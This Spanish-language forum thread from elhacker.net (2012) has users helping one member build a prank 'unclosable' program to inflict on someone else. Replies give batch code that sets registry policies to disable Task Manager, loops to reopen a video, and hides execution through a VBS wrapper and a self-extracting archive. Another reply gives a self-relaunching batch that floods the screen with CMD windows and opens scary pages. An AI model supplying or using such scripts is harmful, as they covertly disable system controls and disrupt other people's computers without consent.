elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  hacer un programa incerrable
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: hacer un programa incerrable  (Leído 7,254 veces)
sasuke48

Desconectado Desconectado

Mensajes: 3


Ver Perfil
hacer un programa incerrable
« en: 6 Diciembre 2012, 02:25 am »

hola quisiria saber como puedo hacer un programa incerrable, en mi caso voy a crear un bat que te lleve a una foto o video y hacer que esa foto o video sea incerrable.(es para hacer un troll ;D) y ademas como ocultar el archivo original porque voy a hacer un acceso directo del bat y no se como ocultar el archivo original


En línea

iTzTito

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: hacer un programa incerrable
« Respuesta #1 en: 6 Diciembre 2012, 14:05 pm »

Mensaje Eliminado por el autor


« Última modificación: 7 Septiembre 2013, 03:35 am por iTzTito » En línea

sasuke48

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: hacer un programa incerrable
« Respuesta #2 en: 6 Diciembre 2012, 14:46 pm »

que es eso ?
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: hacer un programa incerrable
« Respuesta #3 en: 6 Diciembre 2012, 17:00 pm »

Aqui un code de ejmplo
Código
  1. @echo off
  2. REm esto desabilita el administrador de tareas par evitar el cerrado del programa
  3. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v disabletaskmgr /t REG_DWORD /d 1 /f
  4. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system /v disabletaskmgr /t REG_DWORD /d 1 /f
  5. Rem bucle por si cierran el programa
  6. :buajaja
  7. Rem activa archivo o programa y espera a que se cierre
  8. start /WAIT video.avi
  9. Rem redirige a la etiqueta
  10. goto buajaja
  11.  
Podrías meter el batch y la la imagen o vídeo en un archivo comprimido autoextraible.
http://www.youtube.com/watch?v=Tx1UTQLvWgk
También dentro del comprimido podrías poner un vbs, que ejecutara el batch en segundo plano:
Código
  1. Set objshell = createobject("wscript.shell")
  2. Objshell.run "script.bat", 0, true
  3.  
PD: Todo con fines educativos  >:D
« Última modificación: 12 Diciembre 2012, 19:47 pm por Segadorfelix » En línea

sasuke48

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: hacer un programa incerrable
« Respuesta #4 en: 7 Diciembre 2012, 16:53 pm »

cuando hago eso se habre el video/imagen y si lo cierro se vuelve a abir. el problema es que se habre en cmd con la operacion y lo puedo cerrar y cancelar el proceso :(
En línea

ABDERRAMAH


Desconectado Desconectado

Mensajes: 431


en ocasiones uso goto ¬¬


Ver Perfil WWW
Re: hacer un programa incerrable
« Respuesta #5 en: 7 Diciembre 2012, 17:45 pm »

yo diría que hay que usar otro método, yo usaría visual studio, el código es muy sencillo y tienes mucho más control.
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: hacer un programa incerrable
« Respuesta #6 en: 7 Diciembre 2012, 19:28 pm »

cuando hago eso se habre el video/imagen y si lo cierro se vuelve a abir. el problema es que se habre en cmd con la operacion y lo puedo cerrar y cancelar el proceso :(
Para eso es este codigo, va en un archivo .vbs
Código
  1. Set objshell = createobject("wscript.shell")
  2. Objshell.run "script.bat", 0, true
-metes los tres archivos(script.bat,script.vbs y imagen.jpg), en el autoextraible, configura el autoextraible para que inicie el vbscript, el vbs inicia el batch en segundo grado(no se ve la pantalla), el batch inicia la imagen y listo.

PD:Aquí el código para volver a la normalidad el administrador de tareas.
Código
  1. reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v disabletaskmgr
  2. reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system /v disabletaskmgr
« Última modificación: 7 Diciembre 2012, 19:32 pm por Segadorfelix » En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.821



Ver Perfil
Re: hacer un programa incerrable
« Respuesta #7 en: 7 Diciembre 2012, 20:09 pm »

Me parece imposible hacer incerrable "una foto" o "un video", ya que estos tipos de archivo se ejecutan en el visualizador de fotos prodeterminado, y el reproductor de video predeterminado, y esos programas tienen controles para poder cerrar la aplicación pulsando "ctrl+F4" o directamente en el botón "X" para cerrar la app.

Lo mucho que puedes hacer es ocultar el botón de cerrar/minimizar de una aplicación usando NIRCMD.

La mejor opción que se me ocurre es la que ha propuesto el compañero Segadorfelix, reabrir el archivo una vez se haya cerrado.

Saludos
En línea

tmb90

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: hacer un programa incerrable
« Respuesta #8 en: 9 Diciembre 2012, 09:01 am »

No se si se puede hacer incerrable pero trata de iniciarlo en segundo plano, de esta forma no lo va a poder ver
En línea

z3nth10n


Desconectado Desconectado

Mensajes: 1.583


"Jack of all trades, master of none." - Zenthion


Ver Perfil WWW
Re: hacer un programa incerrable
« Respuesta #9 en: 9 Diciembre 2012, 10:54 am »

No se si se puede hacer incerrable pero trata de iniciarlo en segundo plano, de esta forma no lo va a poder ver

Si lo pones en segundo plano y ejecutas musica de yo que se, xD vas a cagar a ala gente, aquí un usuario de youtube que es un cabron: http://www.youtube.com/user/vbictor97

bajale el sonido a tus altavoces y disfruta de la calidad de sus videos xD  :laugh:
----

Tengo otro troll que abre muchas ventanas de CMD me ocurrio cuando intentaba hacer una cosa:

pon este nombre a tu .bat "Hola", yo que se lo que quieras:

y luego pones:

Código:
@echo off
echo Coco
cls
Type "launcher.bat" | Find /I "Caca" >NUL || (start Hola.bat)

Apartir de aquí puedes poner paginas de miedo como:

start http://www.swfcabin.com/swf-files/1306266804.swf

o

start ...

Tengo mas pero ahora mismo no me acuerdo, tengo unos amigos super-trolls en Skype les preguntaré.

Un saludo.

PD: Tengo alguno mas que oto cuando me acuerde te lo mando. :P
« Última modificación: 9 Diciembre 2012, 11:07 am por Seazoux » En línea


Interesados hablad por Discord.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Con que programa podria hacer eso
Diseño Gráfico
Dark Shadow 5 3,093 Último mensaje 15 Septiembre 2005, 00:25 am
por MinusFour
hacer un programa bluetooth « 1 2 ... 5 6 »
Hacking Mobile
caballeroantonio 56 55,080 Último mensaje 3 Septiembre 2010, 08:19 am
por SirGraham
hacer programa Programa para almacenar fotos « 1 2 »
Programación Visual Basic
ThonyMaster 11 8,611 Último mensaje 2 Diciembre 2008, 20:58 pm
por ssccaann43 ©
Web incerrable
Desarrollo Web
Delacure Mihawk 3 7,631 Último mensaje 4 Febrero 2014, 17:24 pm
por Shell Root
Programar programa incerrable C++
Programación C/C++
Kaxperday 6 2,848 Último mensaje 21 Enero 2016, 19:05 pm
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines